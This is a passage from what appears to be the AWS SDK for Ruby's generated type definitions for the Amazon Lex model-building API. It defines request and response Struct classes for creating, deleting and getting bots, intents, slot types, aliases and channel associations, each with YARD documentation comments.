http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateBotVersionResponse AWS API Documentation # class CreateBotVersionResponse < Struct.new( :name, :description, :intents, :clarification_prompt, :abort_statement, :status, :failure_reason, :last_updated_date, :created_date, :idle_session_ttl_in_seconds, :voice_id, :checksum, :version, :locale, :child_directed, :enable_model_improvements, :detect_sentiment) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass CreateIntentVersionRequest # data as a hash: # # { # name: "IntentName", # required # checksum: "String", # } # # @!attribute [rw] name # The name of the intent that you want to create a new version of. The # name is case sensitive. # @return [String] # # @!attribute [rw] checksum # Checksum of the `$LATEST` version of the intent that should be used # to create the new version. If you specify a checksum and the # `$LATEST` version of the intent has a different checksum, Amazon Lex # returns a `PreconditionFailedException` exception and doesn't # publish a new version. If you don't specify a checksum, Amazon Lex # publishes the `$LATEST` version. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateIntentVersionRequest AWS API Documentation # class CreateIntentVersionRequest < Struct.new( :name, :checksum) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the intent. # @return [String] # # @!attribute [rw] description # A description of the intent. # @return [String] # # @!attribute [rw] slots # An array of slot types that defines the information required to # fulfill the intent. # @return [Array<Types::Slot>] # # @!attribute [rw] sample_utterances # An array of sample utterances configured for the intent. # @return [Array<String>] # # @!attribute [rw] confirmation_prompt # If defined, the prompt that Amazon Lex uses to confirm the user's # intent before fulfilling it. # @return [Types::Prompt] # # @!attribute [rw] rejection_statement # If the user answers "no" to the question defined in # `confirmationPrompt`, Amazon Lex responds with this statement to # acknowledge that the intent was canceled. # @return [Types::Statement] # # @!attribute [rw] follow_up_prompt # If defined, Amazon Lex uses this prompt to solicit additional user # activity after the intent is fulfilled. # @return [Types::FollowUpPrompt] # # @!attribute [rw] conclusion_statement # After the Lambda function specified in the `fulfillmentActivity` # field fulfills the intent, Amazon Lex conveys this statement to the # user. # @return [Types::Statement] # # @!attribute [rw] dialog_code_hook # If defined, Amazon Lex invokes this Lambda function for each user # input. # @return [Types::CodeHook] # # @!attribute [rw] fulfillment_activity # Describes how the intent is fulfilled. # @return [Types::FulfillmentActivity] # # @!attribute [rw] parent_intent_signature # A unique identifier for a built-in intent. # @return [String] # # @!attribute [rw] last_updated_date # The date that the intent was updated. # @return [Time] # # @!attribute [rw] created_date # The date that the intent was created. # @return [Time] # # @!attribute [rw] version # The version number assigned to the new version of the intent. # @return [String] # # @!attribute [rw] checksum # Checksum of the intent version created. # @return [String] # # @!attribute [rw] kendra_configuration # Configuration information, if any, for connecting an Amazon Kendra # index with the `AMAZON.KendraSearchIntent` intent. # @return [Types::KendraConfiguration] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateIntentVersionResponse AWS API Documentation # class CreateIntentVersionResponse < Struct.new( :name, :description, :slots, :sample_utterances, :confirmation_prompt, :rejection_statement, :follow_up_prompt, :conclusion_statement, :dialog_code_hook, :fulfillment_activity, :parent_intent_signature, :last_updated_date, :created_date, :version, :checksum, :kendra_configuration) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass CreateSlotTypeVersionRequest # data as a hash: # # { # name: "SlotTypeName", # required # checksum: "String", # } # # @!attribute [rw] name # The name of the slot type that you want to create a new version for. # The name is case sensitive. # @return [String] # # @!attribute [rw] checksum # Checksum for the `$LATEST` version of the slot type that you want to # publish. If you specify a checksum and the `$LATEST` version of the # slot type has a different checksum, Amazon Lex returns a # `PreconditionFailedException` exception and doesn't publish the new # version. If you don't specify a checksum, Amazon Lex publishes the # `$LATEST` version. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateSlotTypeVersionRequest AWS API Documentation # class CreateSlotTypeVersionRequest < Struct.new( :name, :checksum) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the slot type. # @return [String] # # @!attribute [rw] description # A description of the slot type. # @return [String] # # @!attribute [rw] enumeration_values # A list of `EnumerationValue` objects that defines the values that # the slot type can take. # @return [Array<Types::EnumerationValue>] # # @!attribute [rw] last_updated_date # The date that the slot type was updated. When you create a resource, # the creation date and last update date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the slot type was created. # @return [Time] # # @!attribute [rw] version # The version assigned to the new slot type version. # @return [String] # # @!attribute [rw] checksum # Checksum of the `$LATEST` version of the slot type. # @return [String] # # @!attribute [rw] value_selection_strategy # The strategy that Amazon Lex uses to determine the value of the # slot. For more information, see PutSlotType. # @return [String] # # @!attribute [rw] parent_slot_type_signature # The built-in slot type used a the parent of the slot type. # @return [String] # # @!attribute [rw] slot_type_configurations # Configuration information that extends the parent built-in slot # type. # @return [Array<Types::SlotTypeConfiguration>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/CreateSlotTypeVersionResponse AWS API Documentation # class CreateSlotTypeVersionResponse < Struct.new( :name, :description, :enumeration_values, :last_updated_date, :created_date, :version, :checksum, :value_selection_strategy, :parent_slot_type_signature, :slot_type_configurations) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteBotAliasRequest # data as a hash: # # { # name: "AliasName", # required # bot_name: "BotName", # required # } # # @!attribute [rw] name # The name of the alias to delete. The name is case sensitive. # @return [String] # # @!attribute [rw] bot_name # The name of the bot that the alias points to. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteBotAliasRequest AWS API Documentation # class DeleteBotAliasRequest < Struct.new( :name, :bot_name) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteBotChannelAssociationRequest # data as a hash: # # { # name: "BotChannelName", # required # bot_name: "BotName", # required # bot_alias: "AliasName", # required # } # # @!attribute [rw] name # The name of the association. The name is case sensitive. # @return [String] # # @!attribute [rw] bot_name # The name of the Amazon Lex bot. # @return [String] # # @!attribute [rw] bot_alias # An alias that points to the specific version of the Amazon Lex bot # to which this association is being made. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteBotChannelAssociationRequest AWS API Documentation # class DeleteBotChannelAssociationRequest < Struct.new( :name, :bot_name, :bot_alias) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteBotRequest # data as a hash: # # { # name: "BotName", # required # } # # @!attribute [rw] name # The name of the bot. The name is case sensitive. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteBotRequest AWS API Documentation # class DeleteBotRequest < Struct.new( :name) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteBotVersionRequest # data as a hash: # # { # name: "BotName", # required # version: "NumericalVersion", # required # } # # @!attribute [rw] name # The name of the bot. # @return [String] # # @!attribute [rw] version # The version of the bot to delete. You cannot delete the `$LATEST` # version of the bot. To delete the `$LATEST` version, use the # DeleteBot operation. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteBotVersionRequest AWS API Documentation # class DeleteBotVersionRequest < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteIntentRequest # data as a hash: # # { # name: "IntentName", # required # } # # @!attribute [rw] name # The name of the intent. The name is case sensitive. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteIntentRequest AWS API Documentation # class DeleteIntentRequest < Struct.new( :name) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteIntentVersionRequest # data as a hash: # # { # name: "IntentName", # required # version: "NumericalVersion", # required # } # # @!attribute [rw] name # The name of the intent. # @return [String] # # @!attribute [rw] version # The version of the intent to delete. You cannot delete the `$LATEST` # version of the intent. To delete the `$LATEST` version, use the # DeleteIntent operation. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteIntentVersionRequest AWS API Documentation # class DeleteIntentVersionRequest < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteSlotTypeRequest # data as a hash: # # { # name: "SlotTypeName", # required # } # # @!attribute [rw] name # The name of the slot type. The name is case sensitive. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteSlotTypeRequest AWS API Documentation # class DeleteSlotTypeRequest < Struct.new( :name) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteSlotTypeVersionRequest # data as a hash: # # { # name: "SlotTypeName", # required # version: "NumericalVersion", # required # } # # @!attribute [rw] name # The name of the slot type. # @return [String] # # @!attribute [rw] version # The version of the slot type to delete. You cannot delete the # `$LATEST` version of the slot type. To delete the `$LATEST` version, # use the DeleteSlotType operation. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteSlotTypeVersionRequest AWS API Documentation # class DeleteSlotTypeVersionRequest < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass DeleteUtterancesRequest # data as a hash: # # { # bot_name: "BotName", # required # user_id: "UserId", # required # } # # @!attribute [rw] bot_name # The name of the bot that stored the utterances. # @return [String] # # @!attribute [rw] user_id # The unique identifier for the user that made the utterances. This is # the user ID that was sent in the [PostContent][1] or [PostText][2] # operation request that contained the utterance. # # # # [1]: http://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostContent.html # [2]: http://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostText.html # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/DeleteUtterancesRequest AWS API Documentation # class DeleteUtterancesRequest < Struct.new( :bot_name, :user_id) SENSITIVE = [] include Aws::Structure end # Each slot type can have a set of values. Each enumeration value # represents a value the slot type can take. # # For example, a pizza ordering bot could have a slot type that # specifies the type of crust that the pizza should have. The slot type # could include the values # # * thick # # * thin # # * stuffed # # @note When making an API call, you may pass EnumerationValue # data as a hash: # # { # value: "Value", # required # synonyms: ["Value"], # } # # @!attribute [rw] value # The value of the slot type. # @return [String] # # @!attribute [rw] synonyms # Additional values related to the slot type value. # @return [Array<String>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/EnumerationValue AWS API Documentation # class EnumerationValue < Struct.new( :value, :synonyms) SENSITIVE = [] include Aws::Structure end # A prompt for additional activity after an intent is fulfilled. For # example, after the `OrderPizza` intent is fulfilled, you might prompt # the user to find out whether the user wants to order drinks. # # @note When making an API call, you may pass FollowUpPrompt # data as a hash: # # { # prompt: { # required # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # rejection_statement: { # required # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # }, # } # # @!attribute [rw] prompt # Prompts for information from the user. # @return [Types::Prompt] # # @!attribute [rw] rejection_statement # If the user answers "no" to the question defined in the `prompt` # field, Amazon Lex responds with this statement to acknowledge that # the intent was canceled. # @return [Types::Statement] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/FollowUpPrompt AWS API Documentation # class FollowUpPrompt < Struct.new( :prompt, :rejection_statement) SENSITIVE = [] include Aws::Structure end # Describes how the intent is fulfilled after the user provides all of # the information required for the intent. You can provide a Lambda # function to process the intent, or you can return the intent # information to the client application. We recommend that you use a # Lambda function so that the relevant logic lives in the Cloud and # limit the client-side code primarily to presentation. If you need to # update the logic, you only update the Lambda function; you don't need # to upgrade your client application. # # Consider the following examples: # # * In a pizza ordering application, after the user provides all of the # information for placing an order, you use a Lambda function to place # an order with a pizzeria. # # * In a gaming application, when a user says "pick up a rock," this # information must go back to the client application so that it can # perform the operation and update the graphics. In this case, you # want Amazon Lex to return the intent data to the client. # # @note When making an API call, you may pass FulfillmentActivity # data as a hash: # # { # type: "ReturnIntent", # required, accepts ReturnIntent, CodeHook # code_hook: { # uri: "LambdaARN", # required # message_version: "MessageVersion", # required # }, # } # # @!attribute [rw] type # How the intent should be fulfilled, either by running a Lambda # function or by returning the slot data to the client application. # @return [String] # # @!attribute [rw] code_hook # A description of the Lambda function that is run to fulfill the # intent. # @return [Types::CodeHook] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/FulfillmentActivity AWS API Documentation # class FulfillmentActivity < Struct.new( :type, :code_hook) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotAliasRequest # data as a hash: # # { # name: "AliasName", # required # bot_name: "BotName", # required # } # # @!attribute [rw] name # The name of the bot alias. The name is case sensitive. # @return [String] # # @!attribute [rw] bot_name # The name of the bot. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotAliasRequest AWS API Documentation # class GetBotAliasRequest < Struct.new( :name, :bot_name) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the bot alias. # @return [String] # # @!attribute [rw] description # A description of the bot alias. # @return [String] # # @!attribute [rw] bot_version # The version of the bot that the alias points to. # @return [String] # # @!attribute [rw] bot_name # The name of the bot that the alias points to. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot alias was updated. When you create a resource, # the creation date and the last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot alias was created. # @return [Time] # # @!attribute [rw] checksum # Checksum of the bot alias. # @return [String] # # @!attribute [rw] conversation_logs # The settings that determine how Amazon Lex uses conversation logs # for the alias. # @return [Types::ConversationLogsResponse] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotAliasResponse AWS API Documentation # class GetBotAliasResponse < Struct.new( :name, :description, :bot_version, :bot_name, :last_updated_date, :created_date, :checksum, :conversation_logs) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotAliasesRequest # data as a hash: # # { # bot_name: "BotName", # required # next_token: "NextToken", # max_results: 1, # name_contains: "AliasName", # } # # @!attribute [rw] bot_name # The name of the bot. # @return [String] # # @!attribute [rw] next_token # A pagination token for fetching the next page of aliases. If the # response to this call is truncated, Amazon Lex returns a pagination # token in the response. To fetch the next page of aliases, specify # the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of aliases to return in the response. The default # is 50. . # @return [Integer] # # @!attribute [rw] name_contains # Substring to match in bot alias names. An alias will be returned if # any part of its name matches the substring. For example, "xyz" # matches both "xyzabc" and "abcxyz." # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotAliasesRequest AWS API Documentation # class GetBotAliasesRequest < Struct.new( :bot_name, :next_token, :max_results, :name_contains) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] bot_aliases # An array of `BotAliasMetadata` objects, each describing a bot alias. # @return [Array<Types::BotAliasMetadata>] # # @!attribute [rw] next_token # A pagination token for fetching next page of aliases. If the # response to this call is truncated, Amazon Lex returns a pagination # token in the response. To fetch the next page of aliases, specify # the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotAliasesResponse AWS API Documentation # class GetBotAliasesResponse < Struct.new( :bot_aliases, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotChannelAssociationRequest # data as a hash: # # { # name: "BotChannelName", # required # bot_name: "BotName", # required # bot_alias: "AliasName", # required # } # # @!attribute [rw] name # The name of the association between the bot and the channel. The # name is case sensitive. # @return [String] # # @!attribute [rw] bot_name # The name of the Amazon Lex bot. # @return [String] # # @!attribute [rw] bot_alias # An alias pointing to the specific version of the Amazon Lex bot to # which this association is being made. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotChannelAssociationRequest AWS API Documentation # class GetBotChannelAssociationRequest < Struct.new( :name, :bot_name, :bot_alias) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the association between the bot and the channel. # @return [String] # # @!attribute [rw] description # A description of the association between the bot and the channel. # @return [String] # # @!attribute [rw] bot_alias # An alias pointing to the specific version of the Amazon Lex bot to # which this association is being made. # @return [String] # # @!attribute [rw] bot_name # The name of the Amazon Lex bot. # @return [String] # # @!attribute [rw] created_date # The date that the association between the bot and the channel was # created. # @return [Time] # # @!attribute [rw] type # The type of the messaging platform. # @return [String] # # @!attribute [rw] bot_configuration # Provides information that the messaging platform needs to # communicate with the Amazon Lex bot. # @return [Hash<String,String>] # # @!attribute [rw] status # The status of the bot channel. # # * `CREATED` - The channel has been created and is ready for use. # # * `IN_PROGRESS` - Channel creation is in progress. # # * `FAILED` - There was an error creating the channel. For # information about the reason for the failure, see the # `failureReason` field. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex provides the reason that it # failed to create the association. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotChannelAssociationResponse AWS API Documentation # class GetBotChannelAssociationResponse < Struct.new( :name, :description, :bot_alias, :bot_name, :created_date, :type, :bot_configuration, :status, :failure_reason) SENSITIVE = [:bot_configuration] include Aws::Structure end # @note When making an API call, you may pass GetBotChannelAssociationsRequest # data as a hash: # # { # bot_name: "BotName", # required # bot_alias: "AliasNameOrListAll", # required # next_token: "NextToken", # max_results: 1, # name_contains: "BotChannelName", # } # # @!attribute [rw] bot_name # The name of the Amazon Lex bot in the association. # @return [String] # # @!attribute [rw] bot_alias # An alias pointing to the specific version of the Amazon Lex bot to # which this association is being made. # @return [String] # # @!attribute [rw] next_token # A pagination token for fetching the next page of associations. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # associations, specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of associations to return in the response. The # default is 50. # @return [Integer] # # @!attribute [rw] name_contains # Substring to match in channel association names. An association will # be returned if any part of its name matches the substring. For # example, "xyz" matches both "xyzabc" and "abcxyz." To return # all bot channel associations, use a hyphen ("-") as the # `nameContains` parameter. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotChannelAssociationsRequest AWS API Documentation # class GetBotChannelAssociationsRequest < Struct.new( :bot_name, :bot_alias, :next_token, :max_results, :name_contains) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] bot_channel_associations # An array of objects, one for each association, that provides # information about the Amazon Lex bot and its association with the # channel. # @return [Array<Types::BotChannelAssociation>] # # @!attribute [rw] next_token # A pagination token that fetches the next page of associations. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # associations, specify the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotChannelAssociationsResponse AWS API Documentation # class GetBotChannelAssociationsResponse < Struct.new( :bot_channel_associations, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotRequest # data as a hash: # # { # name: "BotName", # required # version_or_alias: "String", # required # } # # @!attribute [rw] name # The name of the bot. The name is case sensitive. # @return [String] # # @!attribute [rw] version_or_alias # The version or alias of the bot. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotRequest AWS API Documentation # class GetBotRequest < Struct.new( :name, :version_or_alias) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the bot. # @return [String] # # @!attribute [rw] description # A description of the bot. # @return [String] # # @!attribute [rw] intents # An array of `intent` objects. For more information, see PutBot. # @return [Array<Types::Intent>] # # @!attribute [rw] enable_model_improvements # Indicates whether the bot uses accuracy improvements. `true` # indicates that the bot is using the improvements, otherwise, # `false`. # @return [Boolean] # # @!attribute [rw] nlu_intent_confidence_threshold # The score that determines where Amazon Lex inserts the # `AMAZON.FallbackIntent`, `AMAZON.KendraSearchIntent`, or both when # returning alternative intents in a [PostContent][1] or [PostText][2] # response. `AMAZON.FallbackIntent` is inserted if the confidence # score for all intents is below this value. # `AMAZON.KendraSearchIntent` is only inserted if it is configured for # the bot. # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostContent.html # [2]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostText.html # @return [Float] # # @!attribute [rw] clarification_prompt # The message Amazon Lex uses when it doesn't understand the user's # request. For more information, see PutBot. # @return [Types::Prompt] # # @!attribute [rw] abort_statement # The message that Amazon Lex returns when the user elects to end the # conversation without completing it. For more information, see # PutBot. # @return [Types::Statement] # # @!attribute [rw] status # The status of the bot. # # When the status is `BUILDING` Amazon Lex is building the bot for # testing and use. # # If the status of the bot is `READY_BASIC_TESTING`, you can test the # bot using the exact utterances specified in the bot's intents. When # the bot is ready for full testing or to run, the status is `READY`. # # If there was a problem with building the bot, the status is `FAILED` # and the `failureReason` field explains why the bot did not build. # # If the bot was saved but not built, the status is `NOT_BUILT`. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex explains why it failed to build # the bot. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot was updated. When you create a resource, the # creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot was created. # @return [Time] # # @!attribute [rw] idle_session_ttl_in_seconds # The maximum time in seconds that Amazon Lex retains the data # gathered in a conversation. For more information, see PutBot. # @return [Integer] # # @!attribute [rw] voice_id # The Amazon Polly voice ID that Amazon Lex uses for voice interaction # with the user. For more information, see PutBot. # @return [String] # # @!attribute [rw] checksum # Checksum of the bot used to identify a specific revision of the # bot's `$LATEST` version. # @return [String] # # @!attribute [rw] version # The version of the bot. For a new bot, the version is always # `$LATEST`. # @return [String] # # @!attribute [rw] locale # The target locale for the bot. # @return [String] # # @!attribute [rw] child_directed # For each Amazon Lex bot created with the Amazon Lex Model Building # Service, you must specify whether your use of Amazon Lex is related # to a website, program, or other application that is directed or # targeted, in whole or in part, to children under age 13 and subject # to the Children's Online Privacy Protection Act (COPPA) by # specifying `true` or `false` in the `childDirected` field. By # specifying `true` in the `childDirected` field, you confirm that # your use of Amazon Lex **is** related to a website, program, or # other application that is directed or targeted, in whole or in part, # to children under age 13 and subject to COPPA. By specifying `false` # in the `childDirected` field, you confirm that your use of Amazon # Lex **is not** related to a website, program, or other application # that is directed or targeted, in whole or in part, to children under # age 13 and subject to COPPA. You may not specify a default value for # the `childDirected` field that does not accurately reflect whether # your use of Amazon Lex is related to a website, program, or other # application that is directed or targeted, in whole or in part, to # children under age 13 and subject to COPPA. # # If your use of Amazon Lex relates to a website, program, or other # application that is directed in whole or in part, to children under # age 13, you must obtain any required verifiable parental consent # under COPPA. For information regarding the use of Amazon Lex in # connection with websites, programs, or other applications that are # directed or targeted, in whole or in part, to children under age 13, # see the [Amazon Lex FAQ.][1] # # # # [1]: https://aws.amazon.com/lex/faqs#data-security # @return [Boolean] # # @!attribute [rw] detect_sentiment # Indicates whether user utterances should be sent to Amazon # Comprehend for sentiment analysis. # @return [Boolean] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotResponse AWS API Documentation # class GetBotResponse < Struct.new( :name, :description, :intents, :enable_model_improvements, :nlu_intent_confidence_threshold, :clarification_prompt, :abort_statement, :status, :failure_reason, :last_updated_date, :created_date, :idle_session_ttl_in_seconds, :voice_id, :checksum, :version, :locale, :child_directed, :detect_sentiment) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotVersionsRequest # data as a hash: # # { # name: "BotName", # required # next_token: "NextToken", # max_results: 1, # } # # @!attribute [rw] name # The name of the bot for which versions should be returned. # @return [String] # # @!attribute [rw] next_token # A pagination token for fetching the next page of bot versions. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of bot versions to return in the response. The # default is 10. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotVersionsRequest AWS API Documentation # class GetBotVersionsRequest < Struct.new( :name, :next_token, :max_results) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] bots # An array of `BotMetadata` objects, one for each numbered version of # the bot plus one for the `$LATEST` version. # @return [Array<Types::BotMetadata>] # # @!attribute [rw] next_token # A pagination token for fetching the next page of bot versions. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotVersionsResponse AWS API Documentation # class GetBotVersionsResponse < Struct.new( :bots, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBotsRequest # data as a hash: # # { # next_token: "NextToken", # max_results: 1, # name_contains: "BotName", # } # # @!attribute [rw] next_token # A pagination token that fetches the next page of bots. If the # response to this call is truncated, Amazon Lex returns a pagination # token in the response. To fetch the next page of bots, specify the # pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of bots to return in the response that the # request will return. The default is 10. # @return [Integer] # # @!attribute [rw] name_contains # Substring to match in bot names. A bot will be returned if any part # of its name matches the substring. For example, "xyz" matches both # "xyzabc" and "abcxyz." # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotsRequest AWS API Documentation # class GetBotsRequest < Struct.new( :next_token, :max_results, :name_contains) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] bots # An array of `botMetadata` objects, with one entry for each bot. # @return [Array<Types::BotMetadata>] # # @!attribute [rw] next_token # If the response is truncated, it includes a pagination token that # you can specify in your next request to fetch the next page of bots. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBotsResponse AWS API Documentation # class GetBotsResponse < Struct.new( :bots, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBuiltinIntentRequest # data as a hash: # # { # signature: "BuiltinIntentSignature", # required # } # # @!attribute [rw] signature # The unique identifier for a built-in intent. To find the signature # for an intent, see [Standard Built-in Intents][1] in the *Alexa # Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/standard-intents # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinIntentRequest AWS API Documentation # class GetBuiltinIntentRequest < Struct.new( :signature) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] signature # The unique identifier for a built-in intent. # @return [String] # # @!attribute [rw] supported_locales # A list of locales that the intent supports. # @return [Array<String>] # # @!attribute [rw] slots # An array of `BuiltinIntentSlot` objects, one entry for each slot # type in the intent. # @return [Array<Types::BuiltinIntentSlot>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinIntentResponse AWS API Documentation # class GetBuiltinIntentResponse < Struct.new( :signature, :supported_locales, :slots) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBuiltinIntentsRequest # data as a hash: # # { # locale: "de-DE", # accepts de-DE, en-AU, en-GB, en-US, es-US # signature_contains: "String", # next_token: "NextToken", # max_results: 1, # } # # @!attribute [rw] locale # A list of locales that the intent supports. # @return [String] # # @!attribute [rw] signature_contains # Substring to match in built-in intent signatures. An intent will be # returned if any part of its signature matches the substring. For # example, "xyz" matches both "xyzabc" and "abcxyz." To find the # signature for an intent, see [Standard Built-in Intents][1] in the # *Alexa Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/standard-intents # @return [String] # # @!attribute [rw] next_token # A pagination token that fetches the next page of intents. If this # API call is truncated, Amazon Lex returns a pagination token in the # response. To fetch the next page of intents, use the pagination # token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of intents to return in the response. The default # is 10. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinIntentsRequest AWS API Documentation # class GetBuiltinIntentsRequest < Struct.new( :locale, :signature_contains, :next_token, :max_results) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] intents # An array of `builtinIntentMetadata` objects, one for each intent in # the response. # @return [Array<Types::BuiltinIntentMetadata>] # # @!attribute [rw] next_token # A pagination token that fetches the next page of intents. If the # response to this API call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of intents, # specify the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinIntentsResponse AWS API Documentation # class GetBuiltinIntentsResponse < Struct.new( :intents, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetBuiltinSlotTypesRequest # data as a hash: # # { # locale: "de-DE", # accepts de-DE, en-AU, en-GB, en-US, es-US # signature_contains: "String", # next_token: "NextToken", # max_results: 1, # } # # @!attribute [rw] locale # A list of locales that the slot type supports. # @return [String] # # @!attribute [rw] signature_contains # Substring to match in built-in slot type signatures. A slot type # will be returned if any part of its signature matches the substring. # For example, "xyz" matches both "xyzabc" and "abcxyz." # @return [String] # # @!attribute [rw] next_token # A pagination token that fetches the next page of slot types. If the # response to this API call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of slot # types, specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of slot types to return in the response. The # default is 10. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinSlotTypesRequest AWS API Documentation # class GetBuiltinSlotTypesRequest < Struct.new( :locale, :signature_contains, :next_token, :max_results) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] slot_types # An array of `BuiltInSlotTypeMetadata` objects, one entry for each # slot type returned. # @return [Array<Types::BuiltinSlotTypeMetadata>] # # @!attribute [rw] next_token # If the response is truncated, the 